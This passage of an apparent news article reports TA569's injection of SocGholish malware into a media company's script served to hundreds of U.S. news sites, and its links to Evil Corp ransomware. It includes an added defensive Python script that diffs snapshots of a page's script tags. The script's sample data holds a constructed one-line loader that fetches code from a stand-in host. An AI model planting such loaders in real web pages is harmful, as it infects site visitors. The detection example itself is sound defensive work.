“The media company in question is a firm that provides both video content and advertising to major news outlets. [It] serves many different companies in different markets across the United States,” Sherrod DeGrippo, VP of threat research and detection at Proofpoint, told BleepingComputer.
“By modifying the codebase of this otherwise benign JS, it is now used to deploy SocGholish.”
In total, the malware has been installed on sites belonging to more than 250 U.S. news outlets, some of them major news organizations, according to security researchers at enterprise security firm Proofpoint.
While the total number of impacted news organizations is currently unknown, Proofpoint says it knows of affected media organizations (including national news outlets) from New York, Boston, Chicago, Miami, Washington, D.C., and more.
We track this actor as #TA569. TA569 historically removed and reinstated these malicious JS injects on a rotating basis. Therefore the presence of the payload and malicious content can vary from hour to hour and shouldn’t be considered a false positive.
— Threat Insight (@threatinsight) November 2, 2022
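Two points in the statements above matter for anyone checking their own sites: the injects are added and removed on a rotating basis, so one clean fetch proves nothing, and the malicious code was delivered by modifying an otherwise benign first-party script, so an allow-list of script hosts alone will not catch it. The following is an added example, not code from the article or from Proofpoint, of how to keep a per-snapshot inventory of a page's script tags (external hosts plus SHA-256 digests of inline blocks and of any external script bodies already fetched) and diff each new snapshot against the last known-good one. The HTML snapshots, script bodies and `.invalid` hostnames are constructed for the example.

```python
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse


class _ScriptTags(HTMLParser):
    """Collect <script src=...> URLs and the text of inline <script> blocks."""

    def __init__(self):
        super().__init__()
        self.srcs = []
        self.inline = []
        self._capturing = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.srcs.append(src)
        else:
            self._capturing = True
            self._buf = []

    def handle_data(self, data):
        if self._capturing:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._capturing:
            self.inline.append("".join(self._buf).strip())
            self._capturing = False


def _sha256(text):
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def inventory(html, fetched_bodies):
    """Return (hosts, digests) for one snapshot of a page.

    hosts   - set of hostnames external scripts are loaded from
    digests - set of (source, sha256) pairs; source is the script URL, or
              "inline" for script blocks embedded in the page
    fetched_bodies maps script URL -> body text already retrieved, so a
    first-party file whose content changed is caught even though its host
    is still on the allow-list.
    """
    parser = _ScriptTags()
    parser.feed(html)
    parser.close()
    hosts = {urlparse(src).netloc.lower() or "(relative)" for src in parser.srcs}
    digests = {("inline", _sha256(code)) for code in parser.inline}
    for src in parser.srcs:
        body = fetched_bodies.get(src)
        if body is not None:
            digests.add((src, _sha256(body)))
    return hosts, digests


def diff_snapshots(baseline, current):
    """Compare two (hosts, digests) inventories and report what is new.

    Keep the baseline as the last known-good snapshot; do not replace it with
    a later fetch just because that fetch came back clean.
    """
    b_hosts, b_digests = baseline
    c_hosts, c_digests = current
    return {
        "new_hosts": sorted(c_hosts - b_hosts),
        "new_or_changed_scripts": sorted({src for src, _ in c_digests - b_digests}),
    }


# Constructed sample data (hypothetical hostnames, not real indicators).
_INLINE = '<script>window.siteConfig = {"section": "local"};</script>'
_EMBED_URL = "https://cdn.example-media.invalid/embed.js"
_LOADER_URL = "https://static.example-inject.invalid/loader.js"

BASELINE_HTML = f'<html><head><script src="{_EMBED_URL}"></script>{_INLINE}</head><body><p>story</p></body></html>'
BASELINE_BODIES = {_EMBED_URL: "function embedPlayer() { /* benign player code */ }"}

# Later snapshot: a new script tag appears AND the benign embed.js was modified.
CURRENT_HTML = (
    f'<html><head><script src="{_EMBED_URL}"></script>'
    f'<script src="{_LOADER_URL}"></script>{_INLINE}</head><body><p>story</p></body></html>'
)
CURRENT_BODIES = {
    _EMBED_URL: "function embedPlayer() { /* benign player code */ }\n"
                "(function(){var s=document.createElement('script');"
                f"s.src='{_LOADER_URL}';document.head.appendChild(s);}})();",
    _LOADER_URL: "/* constructed stand-in for an injected loader */",
}


def run_example():
    """Diff the constructed baseline against the constructed current snapshot."""
    base = inventory(BASELINE_HTML, BASELINE_BODIES)
    cur = inventory(CURRENT_HTML, CURRENT_BODIES)
    return diff_snapshots(base, cur)


if __name__ == "__main__":
    print(run_example())
```

Run it on a schedule (hourly or more often, given the rotation described above) and alert on any non-empty `new_hosts` or `new_or_changed_scripts`; the changed `embed.js` digest is the signal that a host allow-list would have missed.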
“TA569 has previously leveraged media assets to distribute SocGholish, and this malware can lead to follow-on infections, including potential ransomware,” DeGrippo also told BleepingComputer.
“The situation needs to be closely monitored, as Proofpoint has observed TA569 reinfect the same assets just days after remediation.”
Link to ransomware attacks
Proofpoint has previously observed SocGholish campaigns using fake updates and website redirects to infect users, including, in some cases, ransomware payloads.
The Evil Corp cybercrime gang also used SocGholish in a very similar campaign to infect the employees of more than 30 major U.S. private firms with fake software update alerts delivered through dozens of compromised U.S. newspaper websites.
The infected computers were later used as a stepping stone into the employers' enterprise networks in attacks attempting to deploy the gang's WastedLocker ransomware.
Luckily, Symantec revealed in a report that it blocked Evil Corp’s attempts to encrypt the breached networks in attacks targeting multiple private companies, including 30 U.S. corporations, eight of them Fortune 500 companies.
SocGholish has also recently been used to backdoor networks infected with the Raspberry Robin malware in what Microsoft described as Evil Corp pre-ransomware behavior.
Update November 02, 18:22 EDT: Added Proofpoint statement.